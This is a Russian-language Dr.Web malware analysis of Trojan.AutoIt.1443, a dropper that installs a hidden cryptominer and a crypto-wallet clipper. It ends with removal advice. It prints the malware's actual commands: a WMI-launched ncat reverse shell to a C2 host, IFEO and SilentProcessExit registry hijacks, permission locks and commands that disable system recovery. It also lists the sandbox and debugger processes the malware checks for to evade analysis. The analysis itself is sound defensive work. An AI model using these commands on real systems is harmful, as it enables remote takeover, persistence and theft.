Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.AutoIt.1443

Добавлен в вирусную базу Dr.Web: 2024-08-27

Описание добавлено:

SHA1-хеши:

  • 09cffca796dce03c74950e10a349079d9afe3964Б
  • 419ef7dc18d178247daf68f0571a3dccb662792fБ
  • 9c17f83aba6b60c8d461a923050fc9a19e386ec1Б
  • e7ac807a446640a95a961fb5d873c051ee8c2793Б

Описание

Вредоносный AutoIt скрипт для ОС Windows, выполняющий доставку на скомпрометированную систему ряда файлов, необходимых для реализации скрытой добычи криптовалюты и подмены данных в буфере обмена.

Принцип действия

Запуск скрипта выполняется дроппером, представляющим собой самораспаковывающийся архив. После запуска Trojan.AutoIt.1443 выполняет следующие действия:

1. Проверка списка процессов на наличие следующих строк из следующего списка:


dUcAvastUI.exe
avgui.exe
avp.exe
avpui.exe
UninstallTool.exe
UninstallToolHelper.exe
SandboxieRpcSs.exe
SandboxieDcomLaunch.exe
httpdebuggerui.exe
wireshark.exe
fiddler.exe
vboxservice.exe
df5serv.exe
vboxtray.exe
vmtoolsd.exe
vmwaretray.exe
ida64.exe
ollydbg.exe
pIIfaXUcjllboZRestudio.exe
vmwareuser.exe
vgauthservice.exe
vmacthlp.exe
vmsrvc.exe
x32dbg.exe
x64dbg.exe
x96dbg.exe
vmusrvc.exe
prl_cc.exe
prl_tools.exe
qemu-ga.exe
joeboxcontrol.exe
ksdumperclient.exe
xenservice.exe
joeboxserver.exe
devenv.exe
immunitydebugger.exe
importrec.exe
windbg.exe
32dbg.exe
64dbg.exex
protection_id.exex
scylla_x86.exe
scylla_x64.exe
scylla.exe
idau64.exe
idau.exe
idaq64.exe
idaq.exe
idaw.exe
idag64.exe
idag.exe
ida.exe

При нахождении любой из этих программ скрипт завершает свою работу.

2. Создание директорий

C:\ProgramData\NUL..
C:\ProgramData\AUX..
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Для директорий C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} и C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D} устанавливаются атрибуты SYSTEM, HIDDEN и READONLY.

3. Распаковка файлов

C:\ProgramData\NUL..\libssl-1_1.dll
C:\ProgramData\NUL..\vcruntime140.dll
C:\ProgramData\NUL..\libcrypto-1_1.dll
C:\ProgramData\NUL..\StartMenuExperienceHost.exe

Данные файлы не являются вредоносными и предназначены для реализации сетевого взаимодействия посредством исполняемого файла StartMenuExperienceHost.exe, представляющего собой переименованный ncat.exe. Этот файл устанавливает соединение с С2-сервером злоумышленников. Детектируется как Tool.Ncat.1.

C:\ProgramData\AUX..\ShellExt.dll
C:\ProgramData\AUX..\DeviceId.dll

Файл ShellExt.dll, находящийся во всех директориях, представляет собой переименованный интерпретатор языка AutoIt. В данном случае он необходим для запуска вредоносного скрипта, находящегося в оверлее файла DeviceId.dll, имеющего действующую цифровую подпись. Скрипт распаковывает и запускает майнер SilentCryptoMiner (детектируется как Trojan.BtcMine.3767), который встраивается в процесс explorer.exe, используя технику Process Hollowing.

C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellExt.dll
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DeviceId.dll

Аналогичным образом, в данной директории интерпретатор AutoIt (ShellExt.dll), инициируемый nun.bat, выполняет запуск вредоносного скрипта в оверлее файла DeviceId.dll для добычи криптовалюты.

C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun.bat
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellExt.dll
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\7zxa.dll

Данный набор файлов предназначен для запуска клиппера, скрытого в библиотеке 7zxa.dll, который также запускается под видом explorer.exe с помощью методики Process Hollowing. Клиппер выполняет подмену адресов криптокошельков.

C:\ProgramData\inst.bat

Этот сценарий выполняет те же функции, которые описаны в пункте 4.1 ниже.

4. Создание событий и изменение реестра

4.1 События, обеспечивающие подключение к С2-серверу с помощью StartMenuExperienceHost.exe (ncat.exe)


wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nut", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nut", CommandLineTemplate="C:\ProgramData\NUL..\StartMenuExperienceHost.exe --ssl gamesjumpers[.]com 5353 -e cmd.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nut"", Consumer="CommandLineEventConsumer.Name="nut""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nur", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nur", ExecutablePath="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nur"", Consumer="CommandLineEventConsumer.Name="nur""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="per", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="per", ExecutablePath="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="per"", Consumer="CommandLineEventConsumer.Name="per""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="pers", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="pers", CommandLineTemplate="C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\DeviceId[.]dll"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="pers"", Consumer="CommandLineEventConsumer.Name="pers""

4.2 Добавление ключей реестра для запуска вредоносных файлов с помощью техники IFEO


reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MoUsoCoreWorker.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrustedInstaller.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f

5. Настройка

5.1 Изменение прав доступа к директориям путем выполнения следующих команд

icacls "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /C
icacls "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /C

Это отзывает следующие разрешения:

  • Удаление
  • Изменение параметров избирательного управления доступом
  • Запись для владельца
  • Изменение прав доступа
  • Создание файлов / дозапись данных
  • Запись атрибутов, в том числе дополнительных
  • Удаление подпапок и файлов
  • Создание файлов / запись данных

5.2 Отключение восстановления системы путем изменения ветвей реестра:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableSR=1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableConfig=1

Затем выполняется команда:

reagentc /disable

5.3 Запуск файла C:\ProgramData\inst.bat

6. Получение сведений о скомпрометированной машине

Отправка GET-запроса к ip-api[.]com/json для получения геолокационных данных. Сведения о модели видеокарты и установленных антивирусных программах собираются при помощи утилиты winmgmt.exe, модель ЦП извлекается из ветви реестра HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, а информация о операционной системе содержится в переменных @OSVersion и @OSArch в Autoit.

Полученная информация отправляется Telegram боту.

Матрица Mitre

Этап Техника
Выполнение (TA0002) Инструментарий управления Windows (T1047)
Интерпретаторы командной строки и сценариев (T1059)
Выполнение сценариев (T0853)
Общие модули (T1129)
Закрепление (TA0003) Выполнение по событию (T1546)
Внедрение в IFEO (T1546.011)
Автозапуск при загрузке или входе в систему (T1547)
Ключи автозапуска в реестре / Папка автозагрузки (T1547.001)
Перехват исполнения (T1574)
Загрузка сторонних DLL-библиотек (T1574.002)
Эксплуатация разрешений для файлов служб (T1574.010)
Повышение привилегий (TA0004) Внедрение кода в процессы (T1055)
Внедрение в пустой процесс (T1055.012)
Выполнение по событию (T1546)
Внедрение в IFEO (T1546.012)
Ключи автозапуска в реестре / Папка автозагрузки (T1547.001)
Предотвращение обнаружения (TA0005) Обфусцированные файлы или данные (T1027)
Маскировка (T1036)
Внедрение кода в процессы (T1055)
Внедрение в пустой процесс (T1055.012)
Устранение индикаторов (T1070)
Удаление файла (T1070.004)
Изменение реестра (T1112)
Изменение разрешений для файлов и каталогов (T1222)
Сокрытие артефактов (T1564)
Скрытые файлы и каталоги (T1564.001)
Обход виртуализации или песочницы (T1497)
Изучение (TA0007) Изучение системы (T1082)
Изучение установленного ПО (T1518)
Изучение местоположения системы (T1614)
Сбор данных (TA0009) Данные из буфера обмена (T1115)
Захват экрана (T1113)
Организация управления (TA0011) Зашифрованный канал (T1573)
Деструктивное воздействие (TA0040) Завершение работы или перезагрузка системы (T1529)

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке